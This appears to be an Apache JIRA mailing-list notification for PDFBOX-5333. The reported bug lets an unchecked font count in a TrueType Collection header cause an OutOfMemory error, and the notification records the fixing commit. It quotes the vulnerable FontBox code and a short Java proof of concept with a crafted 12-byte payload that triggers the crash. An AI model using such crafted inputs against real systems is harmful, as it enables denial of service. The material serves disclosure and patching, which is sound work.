[jira] [Commented] (PDFBOX-5333) Wrong number of fonts leads to OOM-Exception

Fri, 26 Nov 2021 07:17:32 -0800 


    [ 
https://issues.apache.org/jira/browse/PDFBOX-5333?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17449610#comment-17449610
 ] 

ASF subversion and git services commented on PDFBOX-5333:
---------------------------------------------------------

Commit 1895357 from [email protected] in branch 'pdfbox/trunk'
[ https://svn.apache.org/r1895357 ]

PDFBOX-5333: check number of fonts for invalid values

> Wrong number of fonts leads to OOM-Exception
> --------------------------------------------
>
>                 Key: PDFBOX-5333
>                 URL: https://issues.apache.org/jira/browse/PDFBOX-5333
>             Project: PDFBox
>          Issue Type: Bug
>          Components: FontBox
>    Affects Versions: 2.0.24, 3.0.0 PDFBox
>            Reporter: Andreas Lehmkühler
>            Assignee: Andreas Lehmkühler
>            Priority: Major
>             Fix For: 2.0.25, 3.0.0 PDFBox
>
>
> We got the following error report from Pinohans@JDArmy through security@
> +Description:+
> In FontBox of Apache PDFBox, a carefully crafted PDF
> file can trigger an OutOfMemory-Exception while loading the file. This
> issue affects Apache PDFBox version 1.8 to 3.0.0-alpha2.
>         Product: Apache PDFBox
>         Version: 1.8-3.0.0-alpha2
>         Affected component:
> src/main/java/org/apache/fontbox/ttf/TrueTypeCollection.java
> +Vulnerability:+
> {code}
> 67     TrueTypeCollection(TTFDataStream stream) throws IOException
> 68    {
> 69        this.stream = stream;
> 70
> 71        // TTC header
> 72        String tag = stream.readTag();
> 73        if (!tag.equals("ttcf"))
> 74        {
> 75            throw new IOException("Missing TTC header");
> 76        }
> 77        float version = stream.read32Fixed();
> 78        numFonts = (int)stream.readUnsignedInt();     # Vulnerability
> 79        fontOffsets = new long[numFonts];                     #
> Vulnerability
> 80        for (int i = 0; i < numFonts; i++)
> 81        {
> 82            fontOffsets[i] = stream.readUnsignedInt();
> 83        }
> {code}
> +Attack vector:+
> {code}
> import org.apache.fontbox.ttf.TrueTypeCollection;
> import java.io.*;
> public class main {
>     public static void main(String[] args) throws IOException {
>         byte[] payload = {0x74, 0x74, 0x63, 0x66, 0x00, 0x00, 0x00, 0x00, 
> 0x7F, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF};
>         TrueTypeCollection ttc = new TrueTypeCollection(new 
> ByteArrayInputStream(payload));
>     }
> }
> {code}



--
This message was sent by Atlassian Jira
(v8.20.1#820001)

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to